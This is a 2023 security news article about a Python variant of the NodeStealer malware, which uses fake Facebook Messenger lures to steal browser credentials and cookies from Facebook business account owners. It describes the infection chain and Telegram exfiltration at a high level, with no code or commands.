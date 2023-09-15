An ongoing campaign is targeting Facebook business accounts with fake messages in order to harvest victims’ credentials using a variant of NodeStealer based on Python and potentially take control of their accounts for subsequent malicious activity.

When NodeStealer emerged according to analysts

“The attacks are mainly reaching victims in Southern Europe and North America across several sectors, led by manufacturing services and the technology sector“, has declared Jan Michael, a researcher at Netskope Threat Labs, in an analysis published Thursday.

First documented by Meta in May 2023, NodeStealer had origin such as JavaScript malware capable of stealing cookies and passwords from web browsers to compromise Facebook, Gmail and Outlook accounts.

Palo Alto Networks Unit 42, last month, has revealed a separate wave of attacks occurred in December 2022 using a Python version of the malware, with some iterations also designed to carry out cryptocurrency thefts.

Netskope’s latest findings suggest that the attackers behind the operation have likely resumed their attack efforts, while also adopting tactics used by other adversaries operating in the same country with the same objectives.

Just last week, Guardio Labs has made known how fraudulent messages sent via Facebook Messenger from a botnet of fake and hijacked personal accounts are used to deliver ZIP or RAR archive files to unsuspecting recipients, in order to spread stealer malware.

The same modus operandi serves as the initial vector for NodeStealer’s intrusion chains to distribute RAR files hosted on Facebook’s content delivery network (CDN).

How this “new” malware works

“Images of defective products have been used as bait to convince the owners or administrators of Facebook business pages [Facebook Business] to download the malware payload“, explained Michael.

These archives come with a batch script that, when executed, opens the Chrome web browser and takes the victim to a benign web page. But in the background, a PowerShell command is executed to fetch additional payloads, including the Python interpreter and the NodeStealer malware.

The stealer malware, in addition to capturing credentials and cookies – whether they come from Facebook or not – from various web browsers, is designed to collect system metadata and exfiltrate the information via Telegram.

“Compared to previous variants, the new variant of NodeStealer uses batch files to download and execute Python scripts and steal credentials and cookies from different browsers and for different websites“said Michael.

Michael, at the end, added: “This campaign could be a gateway to a more targeted attack later, as they have already gathered useful intelligence. Attackers who have stolen Facebook cookies and credentials can use them to take control of the account and make fraudulent transactions by leveraging the legitimate business page“.

Multi-platform and “multi-browser”

Since not everyone uses Windows, whoever created NodeStealer thought “well PC users all use a browser, what if we could circumvent browsers instead of operating systems?”.

Round and round, in fact, whether you use Windows, Linux or Mac, the browsers are usually the same, and the majority of them are also Chromium-based, for this reason, in this specific case we chose to attack the browser rather than a flaw in the operating system.